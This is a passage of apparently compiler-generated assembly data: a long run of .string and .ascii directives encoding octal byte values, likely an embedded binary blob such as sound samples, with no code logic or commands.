\017!4AMZZ<GHBB7)B.\017)\037\372\372\372\362\352\357\351\354\336\312\366\352\340\341\310\305\341\003\002\374\356\334\327\305\306\351\345\327\354\365\002/QB4\"7R76JI+26*\033\365\352\350\314\316\332\305\303\320\306\316\330\340\340\317\306\326\353\333\372\374\336\332\350\356\367\354\307\314\273\266\323\350\327\346\360\356\355\350\f\375\355\373'\"&QVRRE4(\372\340\335\312\276\334\313\304\320\326\336\345\351\374\370\327\365" .string "\371\001\032\n\023\032\013\032\017\363\355\371\345\367\020\001\376\013\037328295;TF9U?+;5C,\035\030\021\375\006\004\353\345\330\347\351\347\340\336\322\323\364\361\314\340\355\333\342\350\377\344\323\322\323\312\311\344\343\340\371\026,@GD:\033/T<J8.(@1\021\025\354\356\356\330\321\346\322\307\323\333\341\342\332\337\341\330\342\361\334\355\353\321\340\355\365\323\316\264\274\256\275\324\323\322\303\325\330\355\352\361\370\365\377+;0BR<0./$" .string "\340\336\356\320\352\353\335\365" .string "\016\021\017\t\020\376\007,\037\013\030\022\030\n\006\016\350\345\331\332\324\310\335\333\327\364\002\016\027\020\030\027\034*B769<9NNE9\034-0\017\004\033\366\017\r\016#\032\030\f\f\374\004\377\360\360\367\364\377\370\362\342\315\304\265\307\310\275\316\317\341\022\036\023\004\002\022\f\024\037\022\006\t\017\f\026\b\005\357\323\317\333\331\330\335\322\346\370\370\006\032\017\t\024\027\026$\032\023 \037\020\027\006\355\334\277\312\323\311\307\314\300\274\303\313\330\313\305\314\340\356\370\f\016\016\001\366" .string "\367\325\322\262\250\275\270\274\316\330\336\357\002\023\036\032\027(#;BFC<BSL7:\"\001\005\013\013\031\005\023\021#0)2\"\"+$.9/%&%)+\022\032\372\341\372\345\327\331\333\344\332\357\356\350\342\325\326\340\351\335\364\336\343\365\370\006\003\366\354\331\325\353\361\371\b\027\034;JGF31</?;)8$/8\035\013\370\347\330\303\321\314\304\317\312\323\337\355\354\355\335\342\347\336\350\362\364\347\347\334\362\347\323\313\301\255\252\304\257\270\271\274\277\313\323\332\342\327\353\374\003\027 \026\030\032\027\021\006\353\352\333\324\352\345\360\f\016\025\027 8&%,.2+??8E9A,\022\n\373\351\344\362\352\346\354\373\376\r\n\021\f" .ascii "\006\022\031\031\033\013\036\031*-\"\017\t\005\356\373\356\355" .ascii "\354\365\366\373\006\001\006\374\361\370\372\355\365\001\373" .ascii "\004\f\022\027\005\374\372\357\363\376\022\013\037)!A8@8)&%." .ascii "\035-5#\036\032\021\b\360\336\325\305\303\310\306\274\311\321" .ascii "\322\345\336\337\333\313\333\354\326\350\370\340\337\354\360" .ascii "\346\340\316\311\272\262\271\321\305\314\333\324\337\334\346" .ascii "\351\354\355\001\r\f\026 \031\035\027\022\007\362\354\353\351" .ascii "\340\362\371\006\t\025\032\"(\031(\033\0362,1:849<-\035\f\374" .ascii "\370\356\352\364\363\365\375\t\021\017\t\013\f\002\t\023\026" .ascii "\025\037\034\030\035\035'\016\002\003\361\345\354\363\345\353" .ascii "\363\367\377\371\364\361\362\345\350\350\344\355\370\374\001" .ascii "\t\004\t\374\362\372\003\373\017\033\025(/5;860&!':+.+\035$%" .ascii "\r\006\354\331\344\323\323\323\323\325\340\347\354\353\343\344" .ascii "\343\331\340\355\352\347\365\360\347\361\345\342\331\305\306" .ascii "\272\251\300\303\273\274\314\324\326\332\317\342\336\336\353" .ascii "\361\365\374\001\374\374\364\360\351\333\326\334\343\343\360" .ascii "\375\377\b\023\035$ \037%&(1C9FLCE9=%\036\024\030\024\007\034" .ascii "\030\037\"!,%\032\035\034\036\033'+#0322*%\026\001\373\372\350" .ascii "\352\366\357\360\365\355\364\353\333\340\321\306\304\320\314" .ascii "\330\335\343\350\342\346\334\332\327\353\354\347\375\r\016\031" .ascii "\037 ' \033\033\024\021\036" .string "%!$' \032\017\006" .string "\362\351\353\343\344\360\367\367\377\006\375\005\366\375" .string "\373\t\b\007\b\026\024\020\b\375\370\360\337\331\341\336\341\347\347\342\346\351\344\345\336\341\344\335\345\357\354\356\362\356\351\337\326\330\314\301\321\330\327\331\347\351\357\371\377\373\375\001\007\004\377\027\032&$\"%\036\024\r\007\365\363\001\375" .ascii "\013\024\033\030\036\036\035\023\025 \035!056AFFB5/$" .string "\025\022\026\020\n\026\024\022\025\013\r\013\361\365\363\347\345\362\367\362\006\002\377\002\370\375\004\364\370\007\001\020\035\027\" \036\036\021\013\022\020\t\023\023\r\f\013\002\374\356\343\334\317\310\314\320\314\331\332\331\334\326\334\336\323\326\335\334\333\360\356\354\372\370\361\350\334\332\332\313\327\326\324\321\344\345\340\347\341\352\350\336\344\361\351\362\375\375\375\002\377\373\366\356\364\363\355\365\375\373\004\023\033\034\032\035 \"\035(3*<B8>876\034\032\024\013\r\023\026\021\036 \035\027\025\031\026\f\016\026\025\025#.*12* \020\f\005\370\364\372\364\361\370\370\365\360\351\344\333\313\306\313\310\313\325\333\335\340\351\350\353\337\346\353\336\361\370\370\b\016\026\031\023\016\020\016\b\r\021\025\025\027\024\027\017\016\003\373\361\360\346\336\353\355\354\365\367\367\370\366\370\366\363\362\001\367\006\013\037\b\034\005\b\005\350\016\336\360\360\355\350\324\317\332\330\376\362\370\356\377\037\016\"" .string "\033\021\357\376\006\315\321\277\317\321\331\006\375\376\035(\f\020\0177\013\023\376\024\005\374!\356\030\037\037\013-%\017\016\365\003\027\031\027\370\367\030\371\367\003\351\354\016\376\b\032$E9!.*\"\022" .string "\336\335\354\345\332\346\005\376\364\360\003\357\354\327\330\341\357\017\357\360\361\377\352\335\335\334\366\001\344\003%\024H3\"D3+(\017\032\"\026\020\022\027$&\017\001" .string "" .string "\005\371\364\030\023\r\013\006\360\363\366\325\317\340\350\362\370\366\004\0361\025\021\034\f\001\356\325\345\322\321\324\311\340\350\360\333\317\351\362\346\353\375\003" .string "\004\357\334\350\355\322\311\275\314\337\324\333\343\002\013\021\016\034#\033\030\003\362\021\024\372\003\366\030#\016\005\005\021\022\030\024\005\036)\r\005\004\017\n\361\353\351\361\016\f\t\0221=86.?6\027\373\375\007\364\363\360\342\373\004\362\361\353\366\005\355\346\373\001\375\364\364\363\367\372\354\344\340\361\372\367\377\027,:9/<D>'\027\017\035\037\t\006\f\027\022" .string "\376\f\022\024\006\370\n\025\f\377\361\364\371\362\327\315\337\340\342\351\352\374\031 \025\016\r\013\375\341\322\332\326\326\320\311\327\337\336\322\325\335\356\367\336\342\372\371\362\351\331\343\342\323\313\300\305\322\334\321\333" .string "\013\023\020\f\036\037\025\013\004\005\022\r\375\004\025\025\022\b\001\032\032\027\021\t\027\036\030\b" .string "\f\b\366\353\342\373\b\001\n\025-;=503.\035" .string "\371\002\375\357\355\352\361\372\361\346\353\364\376\371\347\354\375\001\366\365\363\374\371\345\341\336\352\373\372\374\016(7327D=%\036\031\031\026\017" .string "\005\027\025\b\002\n\025\024\006\004\006\r\017\376\362\370\371\361\342\317\321\353\361\351\365\002\027\036\025\016\022\023\t\364\333\335\350\334\313\315\325\336\337\330\332\343\356\357\351\343\354\376\371\347\345\352\352\337\311\305\317\325\334\334\337\364\016\024\r\023 (\037\007\004\017\f\t\003\373\t\024\021\n\007\024#\032\007\r\027\030\025\013" .string "\005\005\366\353\343\357\003\002\372\013#/.++3,\033\n\365\365\376\356\335\340\351\361\350\337\344\363\362\352\345\344\361\373\365\350\352\363\365\346\330\333\350\361\362\366\001\031-,-2;=*\022\022\032\021\006\002\002\016\025\n\007\013\024\033\016\375\005\022\f" .string "\370\364\372\365\344\335\341\353\367\364\355\001\030\034\031\026\030 \026\375\360\351\354\347\333\317\326\351\345\342\340\347\370\372\353\355\367\375\002\362\354\354\363\355\330\315\324\346\345\337\345\373\013\034\033\034+.-\032\013\r\031\016" .string "\002\f\030\027\017\020\034\"!\027\013\026 \025\005\377\004\005\373\352\353\365\373\001\377\001\026,+%%+.\033\001\373\371\363\351\334\326\337\350\342\331\332\343\356\347\326\340\352\355\355\342\340\350\350\340\326\322\337\357\353\342\365\016\034\"\037'20\"\021\013\t\020\001\356\366\005\t\006" .string "\005\024\016\006\377\376\002\t\372\351\354\361\357\341\324\334\354\355\352\355\367\t\032\024\017\030\034\027\007\357\357\365\351\333\323\324\337\346\336\336\347\362\372\363\352\364\004\377\365\361\361\365\360\342\335\341\347\361\355\354" .string "\027 $-71!\034\034\032\033\022\b\025 #\037\035(2+\033\036\"\036\035\025\t\f\017\n\377\370\002\f\013\005\017\036%1.-21'\025\006\004\t\367\345\343\350\352\352\345\342\354\352\351\346\340\350\364\357\346\350\352\353\350\336\341\351\355\356\363\371\t\034\036\036#*)\037\020\f\017\007" .string "\375\371" .string "\t\006\003\005\007\013\003\365\367\375\367\360\354\347\351\350\341\334\334\337\347\346\337\354\375\002\005\007\t\r\b\375\365\355\345\344\333\314\315\330\327\324\326\332\343\344\340\341\346\346\356\353\341\343\347\346\337\332\334\350\345\342\353\367" .string "\r\024\027\033\037\037\032\021\020\031\021\b\016\017\025\034\033\033\035 \037\035\022\022\033\022\t\b\n\t\b" .string "\377\001" .string "\006\t\t\022#'&*,,$\031\023\016\003\373\365\353\354\361\355\351\350\351\355\353\344\351\356\355\356\357\354\356\365\363\362\361\364\374\376\375\b\026\033\"&'*+%!\032\025\030\022\b\r\023\024\024\024\023\023\021\013\t\005\001\004\377\364\365\367\366\362\356\356\360\357\356\366\371\376\013\017\016\022\025\023\f\001\373\370\357\345\340\337\334\343\341\337\342\342\351\350\343\347\357\351\347\351\351\350\353\352\350\350\350\357\362\361\373\t\r\020\024\032\035\035\031\030\025\020\022\023\016\021\034\033\032\032\032\033\027\022\023\021\n\f\t\001\003\006\002\377\374\373" .string "\376\374\006\r\020\030\035\033\036 \033\025\n\003\377\365\351\352\350\344\344\341\336\336\335\335\336\332\333\342\337\334\342\346\347\351\351\353\356\357\365\374\376\004\021\024\023\030\033\033\032\024\021\017\b\b\013\006\t\017\f\n\b\t\007\004\373\374\374\364\365\363\360\357\361\356\354\350\347\355\354\354\365\376\376\004\t\t\f\f\007\002\371\362\357\351\340\342\343\336\337\337\336\342\342\341\345\343\342\346\346\343\351\356\354\354\354\354\357\360\363\375" .string "\004\016\020\022\031\034\036\033\027\030\031\026\025\033\033\035\" \036\037\035\035\031\022\023\023\016\f\017\f\013\013\007\006\004\004\b\013\t\022\032\032\037$%%\"\032\025\r\004\002\374\363\363\363\355\352\351\347\350\344\342\345\343\342\350\352\350\356\363\363\364\365\371\376" .string "\003\f\017\021\032\036\036!# \035\027\026\030\022\022\027\025\023\026\024\020\017\r\013\006\377\377\001\371\370\373\371\367\364\361\360\360\360\365\370\366\376\005\005\t\020\020\r\n\002\377\367\357\357\354\345\345\347\340\341\342\342\342\340\337\341\341\337\346\347\345\352\354\353\353\354\360\365\365\367" .string "\003\004\016\022\023\027\027\027\025\022\024\026\025\025\032\032\031\034\033\030\030\023\022\016\007\t\013\005\004\b\005\002" .ascii "\377\377\377\376\003\007\006\r\025\025\030\034\032\027\021\t" .ascii "\006\377\370\366\362\352\351\351\343\341\340\336\335\330\326" .ascii "\333\332\332\341\344\344\350\353\354\357\361\366\374\374\377" .ascii "\b\013\f\024\027\026\030\025\024\022\016\020\022\016\r\022\017" .ascii "\r\016\f\n\006\001\377\374\366\367\371\364\363\365\363\360\357" .ascii "\355\357\357\356\364\366\366\377\005\006\b\013\b\004\377\371" .ascii "\367\361\352\351\344\332\333\332\331\331\334\335\342\341\347" .ascii "\356\363\362\374\373\375\374\377\374\374\372\370\373\350\363" .ascii "\333\335\333\364\332*2\033B\037F\023\362\370$\372#$\022\026\025" .ascii "\030\361" .string "\365\365\004" .string "3\375\006\366\350\341\366\326\330\025\307\322\317\300\266\356\273\341\351\327'\365\007\001\372\313\345\350\007,\373\021\351\315\302\335\276\346\006\0275\037W-2%\026!\026\023\351\321\260\254\255\324\321\004\004\377$\355\026\030\022\013%\024%6\021\033\353\367\377\004\0016,\035I60\f\n\371\t\374\020\026\372\001\365\354\367\025\365:'#F\021+:21L\032.4\b\021\365\347\341\377\365#)-C\366\337\343\336\343\013\347\374\001\323\323\303\304\267\336\336\003\n\030M3=7 \0346\0161+\003\036\002\367\370\005\363\033\007\b\021\346\364\364\356\346\374\320\353\344\302\324\267\262\277\333\321\375\365\366\017\376\370\363\345\332\001\344\r\b\351\361\315\301\314\320\323\020\376\030;.86\"\013\035\360\370\336\267\272\250\261\305\351\341\021\002\001\034\016\r\025\021\0132\013+!\f\032\375\376\t\f\020;\0376=\037\030\n\001\002\032\360\016\001\356" .string "\357\355\375\f\0041\031)-\"2;/#>\0260\031\377\001\361\352\371\006\3776\035 \005\330\322\323\334\336\364\330\363\335\305\313\304\275\325\355\351\"!EK51%\035\031,\f$\020\371\375\361\347\363\377\365\034\375\r\001\355\355\343\332\331\353\317\347\312\304\300\267\273\317\336\335\007\360\t\001\355\346\334\324\341\375\351\007\356\334\324\311\302\330\347\355 \013,1$\037\027\002\377\004\330\341\276\260\252\264\272\326\355\364\032\007\035\036\024\017\027\016\025)\0310\027\021\n\006\006\031#$A(6&\023\016\020\005\013\023\377\021\365\370\361\360\362\f\026\0308#2/302%-0\027(\006" .string "\371\363\364\017\025\0344\n\374\340\320\320\336\325\347\355\324\351\313\311\310\317\321\362\005\026C;J<0\036&\027\035\"\r\034\376\372\361\362\353\001\006\b\031\377\005\361\351\337\345\327\341\342\320\336\301\305\300\303\310\344\351\364\t\370\003\353\340\332\345\333\362\374\350\367\334\325\315\323\324\363\371\013'\031+\036\025\t\013\362\365\351\310\317\265\263\266\306\317\362\373\r#\025$\033\024\016\037\024%(\034'\024\022\023\034\026106>*.\034\025\016\030\t\025\020\003\t\364\367\365\375" .string "\037\037-:/=31+2 .%\024\030\001\001\377\007\t(\031\034\030\356\346\327\323\321\342\325\351\342\325\336\315\315\323\344\354\026\0378L>>/$\027\"\022\036\026\f\r\372\367\365\376\367\017\b\r\013\371\372\352\342\333\345\325\343\332\322\323\303\305\307\321\325\365\360\376" .string "\361\360\340\333\334\351\340\367\356\346\346\326\325\327\341\347\b\004\030\"\027\030\f\001\367\365\333\344\320\300\302\270\272\307\333\344\007\007\033!\030\031\026\021\020\037\024( \036!\032\030\035)$9091$!\027\020\f\025\005\022\004\002" .string "\364\367\376\b\016*%6626-&$(\024#\023\016\r\004\005\013\020\021#\f\t\367\337\327\322\315\320\334\320\344\331\324\327\324\326\345\367\007(+@>3)\"\027\021\027\n\026\b\006\004\374\367\374" .ascii "\376\r\001\t\375\362\352\341\330\327\335\322\337\320\321\315" .ascii "\306\310\323\331\340\370\360\374\361\350\343\334\326\335\345" .ascii "\333\356\341\341\337\330\327\344\347\361\f\005\026\022\013\001" .ascii "\370\351\344\341\314\327\305\301\302\304\307\333\350\365\020" .ascii "\f\035\032\027\020\021\r\020\030\023&\033 \037\032\"$&3(3%\036" .ascii "\027\022\b\013\r\005\021\377\002\377\373\374\013\017\032/*;4" .ascii "1,&\027\032\030\f\031\n\013\b\004\001\f\007\007\017\370\364\343" .ascii "\332\321\323\313\326\334\324\345\333\335\335\343\347\373\007" .ascii "\03331=3+\035\032\f\016\r\007\022\003\004\375\373\364\373\370" .ascii "\377\007\373\004\363\353\341\340\325\334\333\327\342\321\325" .ascii "\322\320\320\341\341\355\373\361\373\355\345\337\340\323\340" .ascii "\343\336\353\336\341\334\332\331\353\353\371\f\007\016\005\376" .ascii "\361\355\333\337\331\317\326\312\316\315\325\333\360\366\b\031" .ascii "\026\037\031\027\016\021\013\030\031\035*\037$\037\036\032%\037" .ascii "+1'.!\032\022\024\b\023\r\013\024\003\005\005\006\005\032\032" .ascii "+75>4+!!\r\030\023\020\026\n\n\005\003\374\t\377\001\376\360" .ascii "\354\336\331\323\331\321\341\341\343\353\344\352\352\363\372" .ascii "\022\030.958*\"\027\024\007\025\r\r\023\005\003\374\371\366\001" .ascii "\371\006\007\373\375\362\350\342\344\330\347\340\337\345\332" .ascii "\331\332\334\333\357\354\374\377\367\371\357\344\336\344\331" .ascii "\350\345\350\353\341\337\335\337\336\362\363\004\b\006\006\372" .ascii "\361\350\347\327\341\330\332\332\324\333\335\343\354\004\003" .ascii "\031\036\034\037\026\022\021\024\016% &+\"!\036\033\032) /0'" .ascii "&\037\026\022\024\n\030\016\017\021\t\007\n\017\022'&9<85, \027" .ascii "\030\r\030\020\024\020\006\002\377\374\370\001\366\375\361\351" .ascii "\345\334\326\330\335\331\353\344\355\356\352\360\370\375\t##" .ascii "751,\037\024\022\021\007\031\016\020\f\002\374\372\366\366\005" .ascii "\372\007\002\372\364\354\344\342\343\334\354\341\342\341\335" .ascii "\331\336\342\347\367\363\002\374\367\357\350\340\337\342\337" .ascii "\356\345\352\345\336\331\334\336\345\365\364\006\376\373\367" .ascii "\356\341\341\336\326\343\327\336\335\331\335\351\354\371\016" .ascii "\f \033\031" .string "\026\022\t\022\026\024(\"'!\034\026\032\025\032( -'\"\032\027\r\017\017\t\026\f\016\b\007\005\f\021\035,+;4.$\035\021\020\016\f\026\t\f\003\373\364\366\357\363\367\354\365\346\337\333\331\321\333\335\337\356\345\357\356\355\361\001\005\026((5+$\033\026\b\017\016\n\026\013\013\001\372\362\370\362\371\003\373\003\370\363\352\347\335\344\341\340\352\340\342\333\333\331\342\343\361\373\367\001\365\360\346\343\334\344\341\345\357\342\344\334\330\324\335\336\354\365\363\377\364\356\347\343\327\337\332\332\343\331\337\336\336\340\363\365\006\023\024\037\026\022\016\017\b\030\032\035( \030\024\016\030\023\037&#'\036\033\022\021\b\021\f\r\022\n\n\004\006\007\023\026)0/5)\"\027\022\t\022\n\r\021\003\002\370\362\354\361\351\363\360\350\354\340\332\327\332\323\343\341\350\361\352\360\361\363\370\r\020%+,/#\032\024\021\007\024\020\022\022\b\005\373\367\362\374\364\002\001" .string "\377\365\357\346\342\330\345\332\344\337\337\331\331\325\340\340\341\006\003#\001\333'\354\330\312\247\b4?\343\023 \363\017\375\347(\367\0160\362" .string "\316\005\246\307\350\247\304\334\307\026\363\300\016\352$CF3*\001\330\263\325\333\331\364\376\006\350\360\330\332\345\362\335\350\022\372\335\314\270\232\274\261\256\345\311\341\313\276\300\270\322\321\342\336\340\346\350\273\317\341\360\n\023-\0312\037\016\n\030-&.\031\024\024\r\367\004\026-\025\b\027\016/!\026/ISZWIC@+\020\025\n\026\034\377\005\034$\033\023\033\037&1&'*\016\371\333\330\344\346\331\333\340\341\001\366\344\367\006\005\025\t\004\007\353\342\315\323\321\340" .string "\362\017\037\025\036\021\020)(\033\022\024\b\366\350\334\356\357\376\004\366\007 \020\362\343\356\023\0341-9D2#\007\023\034\031\f\016\031)&),*OMO^WO7 \003\003\007\370\344\342\344\345\350\341\342\353\002" .string "\371\347\350\345\320\301\250\255\254\256\263\264\277\314\305\300\311\323\351\337\336\342\333\351\335\301\272\305\304\312\307\303\316\345\344\350\376\001\027\t\006\020\022\030\022\376\364\376\376\364\353\365\374\016\b\006\032'<;BMZ_M/('\030\034\003\375\f\004\365\356\366\b$\037\036 \034\003\345\343\357\356\367\357\361\003\006\372\363\372\006\027\t" .ascii "\005\007\373\356\331\327\344\334\341\317\333\356\355\350\344" .ascii "\354\376\024\b\b\013\r\b\372\346\347\370\363\373\363\002\024" .ascii "\025\016\017 ':1.<HI>-*" .string "6'\037\022\032\"\033\025\020\032-9,246,\023\377\363\354\327\325\323\355\007\t\f\017\035.8#$)#\024\005\365\367\b\371\374\374\f##\030\026\036#%\016\013\007\377\351\317\301\303\316\300\302\275\312\324\316\304\311\330\337\346\326\332\334\330\312\273\260\270\305\267\274\272\307\323\317\311\327\354\367\003\365\374\377\367\346\323\324\337\354\344\343\344\362\374\372\371\t\037*/\034\035\033\017\372\347\346\360\374\362\371\377\021\"$%9JNR:;7#\013\362\346\352\361\345\351\363\005\f\n\006\023'(,\036#(\033\004\365\360\367\376\354\353\356\370\370\361\361\001\027\031\034\013\017\017\376\352\332\335\343\351\334\336\345\361\364\356\357" .string "\026\026\026\f\021\022\006\364\353\360\367\374\354\357\366" .ascii "\004\006\022.GGF883\036\006\371\372\377\001\361\365\376\b\t\006" .ascii "\f\0371$\031\002\370\367\352\334\342\363\377\b\374\003\020\027" .ascii "\030\027 4KFEACE9**863\037\033\037\037\025\013\020\032+\036\024" .ascii "\013\t\003\355\332\326\336\332\330\305\303\314\314\307\304\317" .ascii "\341\362\347\344\340\340\334\310\271\267\302\300\277\262\266" .ascii "\304\306\303\300\317\337\357\345\340\335\333" .string "\330\303\266\271\310\310\311\276\303\321\316\312\311\324\345\365\351\350\354\355\355\341\332\346\375\374\375\366\372\b\005\377\376\013\026!\021\b\016\016\f\001\375\006\031\023\021\t\016\035\036\036$9ISHEHE=) $1($\035$1-(,>HO>8:4+\031\020\025 \024\f\004\007\024\r\t\021%/5' #\034\020\374\367\377\017\006\004\004\007\021\007\377\001\020\022\022\377\365\370\357\342\322\317\323\334\314\302\274\266\266\251\241\250\277\315\327\325\332\346\344\337\326\331\340\355\347\344\351\360\375\374\001\021+6<424&\032\013\007\b\013\375\364\362\363\372\362\364\377\021\025\030\017\f\021\005\372\357\357\363\373\355\352\357\361\370\365\371\006\031\032\036\026\022\027\016\003\374\377\377\004\365\357\361\361\365\360\363\374\016\020\023\016\f\021\005\372\361\362\360\360\342\334\335\335\342\340\346\363\007\t\f\t\t\013\377\365\354\355\352\351\330\322\320\316\322\316\326\346\372\374\002" .ascii "\377\002\366\360\353\357\362\367\354\353\360\360\364\363\371" .ascii "\006\025\021\024\020\f\020\006\376\374\377\375\377\361\357\362" .ascii "\360\362\363\372\006" .string "\030\026\032\027\023\024\t\001\377\005\004\007\376\001\005\005\t\n\023\036-+0/25+&#%\037\035\017\r\013\005\006\004\013\026\"\035 \032\024\017\375\361\351\344\334\336\324\331\341\345\357\367\005\025%#+,+-'$'-,2*.20005:@88.&\036\020\006\003\004\376\375\362\363\361\355\356\360\366\374\003\373\374\365\362\355\341\335\337\341\335\336\324\327\326\322\326\330\340\352\362\354\360\351\345\337\323\317\320\317\312\315\303\307\310\306\312\320\327\341\350\340\344\336\331\323\313\307\310\312\307\313\304\311\314\314\317\327\340\351\360\353\356\346\341\332\322\317\322\326\327\335\332\345\350\353\360\371\003\f\024\023\032\024\025\022\r\013\020\021\020\023\013\022\020\017\024\034\".405-*#\035\031\036\035\033\037\031\035\033\034\036%(374:54.*(,*()#(&),5<EFAC71%\036\027\027\022\020\017\007\013\004\001" .string "\001\377" .string "\372\362\362\346\344\337\336\340\351\353\361\365\363\374\373\376\004\017\026#')/**&\"\037#\034\031\024\f\013\002\377\375" .string "\377\005\003" .string "" .string "\370\364\352\346\342\344\335\335\331\323\323\313\314\316\324\330\343\341\343\344\335\333\324\321\320\324\316\323\321\316\322\315\316\320\326\327\341\335\337\340\331\326\322\320\320\325\321\326\323\317\320\314\314\317\327\331\344\342\346\346\341\337\335\333\332\337\333\340\333\334\334\330\331\334\342\346\361\361\371\371\371\374\373\374\001\006\003\n\006\t\n\b\f\024\033\".+1/,($ #% (#$$!!&)-5162/*'$&%!%\036\037\035\036\037&+397=750.*-,+.'(# \035 %&\"%\034\026\020\013\003\004\374\365\362\344\340\327\323\322\332\335\350\357\362\372\370\371\370\372\367" .string "\001\005\n\t\017\017\023\027 #-..-% \027\020\t\t" .string "\376\371\363\360\353\352\353\357\360\372\367\370\367\360\353\344\335\331\332\322\326\323\320\320\317\317\323\331\333\347\345\350\350\344\340\335\332\327\331\323\326\321\315\315\314\313\317\327\332\345\344\351\350\343\337\333\326\323\325\320\325\320\320\317\316\317\325\332\337\350\346\353\347\343\340\335\330\330\331\324\331\324\326\330\332\336\352\362\373\b\n\022\021\017\r\f\007\n\f\t\017\r\017\017\021\023\032\037$-*.+)$\"\036\036\036\030\034\025\027\023\032\017$\033\0379&4\f\027\022\007\027$)\016GF.A4\027\023,LVCR/=G$\032##\366 \376\001\026\363\005\002" .string "\017\007\005\013\005\372\341\370\376\347\340\355\353\351\350\357\374\377\021'\037$9,#/3\024\021\030\034\027\031\027\0310\007\025%\024 \035\030\035\037\025\023\007\001\005\001\363\364\371\002\005\005\024\021\002\027\024\003\022\005\371\352\354\343\332\340\315\317\335\332\335\330\331\337\317\347\342\330\361\342\337\354\332\337\346\332\340\337\342\344\365\377\361\362\376\356\346\363\363\356\350\352\326\323\334\321\304\270\300\274\306\316\305\312\302\314\315\316\344\327\330\347\316\337\351\325\367\372\361\377\f\021\017\027\016\017\032\025\036\035\033\034\t\n\003\360\370\375\361\365\003\001\367\001\n\003\377\004\r\026\022\022\376\002\006\363\021\007\005\033\030\030&\033\030$\036\"#'\034\021\013\004\373\373\376\370\377\b\004" .string "\r\005\002\t\b\r\016\022\n\013\b\003\003\374\007\006\007\013\n\b\006\367\373\373\354\360\354\361\353\345\334\324\335\334\340\351\356\360\370\374\376\001\004\020\024 +,+0* $#(*-02//%&* )\"\035\032\020\007\373\362\360\357\357\360\356\360\345\350\350\347\362\366\375" .string "\001\001\001\370\372\373\367\377\b\013\022\024\r\023\f\016\020\013\023\013\n\006\371\365\361\351\346\347\346\351\350\347\337\344\342\343\354\352\360\361\361\353\353\347\346\344\347\357\361\370\376" .string "\372\001\377\377\b\b\016\016\r\n\007\001\376\373\372\377\377\005\003\005\005\003\b\n\021\026\033\034\034\031\031\025\026\027\030\036!&#%## \036$ \037\030\r\n\377\371\371\363\364\364\366\362\370\366\363\371\371" .string "\005\t\f\f\b\007\002\001\004\004\f\r\020\021\024\017\016\r\b\t\006\007" .string "\371\355\345\327\320\314\303\302\273\274\270\271\267\271\277\300\312\323\331\340\347\344\351\352\356\367\374\007\016\027\033!\"&%$'%\"\037\031\f\006\373\367\363\354\357\354\352\350\350\344\343\347\345\352\356\356\357\356\346\350\344\337\346\347\355\363\367\367\374\372\372\375\372\376\375\375\371\367\355\350\342\333\335\331\332\331\333\331\331\331\334\337\342\353\356\362\362\364\356\356\353\347\356\356\364\370\372\372\374\370\370\371\366\372\371\366\362\357\345\341\334\326\332\327\335\342\344\345\354\355\362\374" .string "\t\017\025\026\031\026\027\030\026\037#*14584585985/+ \032\024\f\r\013\013\013\013\b\t\007\b\016\017\026\032\035\034\035\031\027\030\030\037\"(-//0..2/30-( \026\017\n\002\003\377\377\375\373\366\366\362\357\364\361\365\364\361\356\351\342\337\340\335\346\353\361\370\376" .ascii "\004\007\t\023\025\034 !\036\034\030\025\025\021\025\025\025" .ascii "\025\024\017\017\017\r\024\024\031\033\032\027\024\017\n\013" .ascii "\t\016\020\023\025\025\020\017\016\t\r\013\f\t\005\376\367\360" .ascii "\350\347\342\344\343\344\343\342\341\340" .string "\342\342\352\355\362\365\365\362\360\355\353\360\360\370\374" .string "\002\003\002\001\001\377\003\001\001\377\370\360\351\341\330\327\321\322\320\316\314\312\306\306\312\312\323\330\337\343\345\345\347\350\351\362\366" .string "\007\r\021\024\024\026\033\032!!\"!\035\030\022\r\007\b\003\004\004\003" .string "\377\375\374" .string "\377\006\t\n\013\n\006\004\003\001\006\006\013\016\017\020\021\020\017\023\022\027\025\025\024\017\b\004" .string "\372\373\367\370\366\364\362\361\360\360\365\364\373\375\376\377\374\367\366\364\357\364\362\363\363\361\355\353\347\344\346\341\343\341\336\333\330\324\322\321\316\324\324\330\333\336\341\345\352\357\371\376\007\f\020\022\023\021\021\023\021\026\025\030\031\030\027\026\025\024\027\024\026\022\016\n\004\375\370\364\355\356\347\346\343\337\336\335\335\337\345\346\355\356\357\357\357\354\356\357\356\365\365\367\371\372\372\374\374\375\002\377\003\001\376\373\371\363\360\357\352\354\347\346\344\342\337\337\340\340\346\345\351\350\347\345\343\340\337\341\340\345\344\350\351\352\354\360\364\367\377" .string "\007\007\t\n\t\007\t\t\007\013\t\n\n\n\n\016\020\024\034\034\"\"\"\"!\036 \037$!\"#\"!#\"#'#%\"\036\032\027\022\020\016\n\r\b\007\007\006\005\b\n\016\024\024\030\027\026\025\026\023\024\025\025\030\026\027\026\026\025\027\026\027\030\025\025\020\013\005\377\370\364\356\347\345\336\333\327\324\324\327\331\336\345\347\356\360\363\365\372\373\002\007\013\024\026\033\037#&,-1413/+'$\036\034\030\024\024\016\013\b\006\004\007\006\t\013\t\n\006\004" .string "\377\374\376\375\375\377\375\377\377\377" .string "\004\004\007\t\b\t\005\003" .string "\376\372\372\370\365\365\361\360\356\356\357\364\364\372\375\374\376\374\372\370\370\365\370\365\365\366\362\362\361\361\360\363\360\363\362\357\356\353\347\344\344\341\344\342\343\345\344\347\351\355\361\371\376\006\n\r\020\021\021\022\025\024\031\031\034\035\035\036\037 \"&%('%$\037\034\031\026\021\022\r\013\b\004\002\001" .string "\002\006\006\f\013\013\013\t\b\b\007\006\013\b\013\013\013\f\016\016\020\024\022\026\024\022\020\r\b\006\003" .string "\001\373\372\367\363\360\357\355\355\357\355\357\352\350\343\337\332\330\325\324\326\323\326\326\327\332\336\342\351\356\363\372\373" .ascii "\002\003\004\b\b\013\016\f\016\f\013\013\f\013\017\022" .string 